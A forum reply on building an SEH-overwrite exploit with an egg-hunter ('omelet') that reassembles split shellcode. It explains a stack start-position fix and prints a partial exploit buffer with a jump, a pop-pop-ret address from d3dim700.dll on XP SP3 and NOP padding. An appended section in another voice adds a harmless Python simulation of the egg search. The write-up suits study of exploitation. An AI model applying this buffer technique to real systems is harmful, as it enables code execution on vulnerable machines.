Re: SEH Exploit and trouble with shellcode
Good point bolexx...no need not share. So here we go....
Dudeman pointed me to some real handy links that ultimately got me the answers that I need. Specifically this one: http://www.corelan.be/index.php/2010...ggs-to-omelet/
When you attach a debugger and trigger the exploit (SEH), you can see parts of your buffer in 2 areas on the current stack frame where you can house shellcode. I split the shellcode up into 3 123-byte sections, added the appropriate 4-byte tags and used Corelan's omelet hunter code (nasm to compile and their pvereadbin.pl to extract shellcode) to search for the eggs. Unfortunately it never found them....I needed to modify the omelet hunter code to use a different start position.
The omelet hunter code does this basically:
1. Makes EDI point to the bottom of the stack with a "or di, 0xffff"
2. copies that value to EDX
3. Calculates the start location that points to where the shellcode will be reassembled at, and puts this in EDI
4. Begins searching for the shellcode using EDX (which points to bottom of the stack frame) as the starting location
5. puts the tag to search for in EAX and compares the value at the location of EDX with EAX...when found exits the loop and copies the shellcode to the appropriate location.
6. Repeats for all eggs
7. Executes a JMP EDI to jump to start address of shellcode.
If you throw a "xor dx, 0xffff" right before step 4, you will set EDX to the top of the current stack frame (instead of the bottom of the stack frame) and be good to go.
When I was troubleshooting I set a series of breakpoints and stepped through the omelet hunter code...pretty cool to watch if I must say so myself. I basically set a breakpoint at the pop pop ret and F7'd until I hit the omelet hunter shellcode, then set a breakpoint on the instruction right after the loop and hit F9 to get it through the loop. Examined the registers once it hit the breakpoint, then repeated. It was a great exercise in getting familiar with the asm and stepping through the shellcode with a debugger. Note: the omelet hunter code was 98 bytes without any nulls; each part was 127 bytes.
The snippet from the final exploit looked like this:
junk = "\x42"*4
nseh = "\xeb\x06\x90\x90" #short jump (eb 06 = jmp +6) forward over the seh handler address
seh = "\x5b\x2f\x95\x73" #73952F5B pop, pop, ret d3dim700.dll xpsp3
nops = "\x90" * 16
shell = omlet + "\x90\x90" + part3 + ("\x60"*15603) + "\x90\x90" + part1 + "\x90\x90" + part2
buf = ("\x90" * (210000 - len(head+junk+nseh+seh+nops+shell)))
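To make the start-position problem from the post concrete, here is a small Python model of the tag search and reassembly described in steps 1-7. It is an added example, not the post's code and not Corelan's omelet hunter: memory is a flat 128 KiB byte string standing in for two adjacent 64 KiB blocks, the 3-byte marker "w00" plus a one-byte egg index is my own tag convention, the 123-byte chunk size matches the post's split, and the egg offsets and payload bytes are constructed. The model scans upward from the start address, which is what makes "or di, 0xffff" (end of the block) overshoot the eggs and "xor dx, 0xffff" (low 16 bits cleared, start of the block) find them.

```python
MARKER = b"w00"   # constructed 3-byte marker; the 4th tag byte is the egg index
CHUNK = 123       # payload bytes per egg, matching the post's 3 x 123-byte split
BLOCK = 0x10000   # 64 KiB block whose low 16 bits "or di,0xffff" / "xor dx,0xffff" manipulate


def make_tag(marker, index):
    """4-byte tag = marker + egg index, so eggs are found in order."""
    return marker + bytes([index])


def split_into_eggs(payload, marker=MARKER, chunk=CHUNK):
    """Cut the payload into chunk-sized pieces, each prefixed with its tag (127 bytes here)."""
    return [make_tag(marker, i) + payload[off:off + chunk]
            for i, off in enumerate(range(0, len(payload), chunk))]


def build_memory(eggs, offsets, size=2 * BLOCK):
    """Constructed memory: 0x60 filler (like the post's padding) with eggs dropped in."""
    mem = bytearray(b"\x60" * size)
    for egg, off in zip(eggs, offsets):
        mem[off:off + len(egg)] = egg
    return bytes(mem)


def hunt(mem, start, egg_count, marker=MARKER, chunk=CHUNK):
    """Model of the search loop: scan upward from `start` for tag 0, 1, 2, ...
    and append the bytes after each tag. Returns None if any egg is not found
    above the current scan position (the post's 'never found them' case)."""
    out = b""
    pos = start
    for i in range(egg_count):
        idx = mem.find(make_tag(marker, i), pos)
        if idx < 0:
            return None
        out += mem[idx + 4:idx + 4 + chunk]
        pos = idx + 4 + chunk          # continue above the egg just consumed
    return out


def demo(payload, offsets=(0x1200, 0x2000, 0x3400)):
    """Run the hunt from both start positions discussed in the post.
    The eggs sit inside the first 64 KiB block (constructed offsets)."""
    eggs = split_into_eggs(payload)
    mem = build_memory(eggs, offsets)
    block_base = 0
    edi = block_base | 0xFFFF          # step 1: "or di, 0xffff" -> end of the block
    edx_bottom = edi                   # step 2: copied to EDX, original start position
    edx_top = edx_bottom ^ 0xFFFF      # the fix: "xor dx, 0xffff" clears the low 16 bits
    return hunt(mem, edx_bottom, len(eggs)), hunt(mem, edx_top, len(eggs))


# Constructed 369-byte stand-in for a payload (3 x 123); contains no tag bytes.
PAYLOAD = (b"abcdefghij" * 37)[:369]

if __name__ == "__main__":
    missed, found = demo(PAYLOAD)
    print("start at block end  :", "not found" if missed is None else "found")
    print("start at block start:", "reassembled OK" if found == PAYLOAD else "mismatch")
```

Scanning upward from 0xFFFF never revisits the block that holds the eggs, so the first hunt returns None; clearing the low 16 bits moves the start below every egg and the three chunks come back concatenated in tag order.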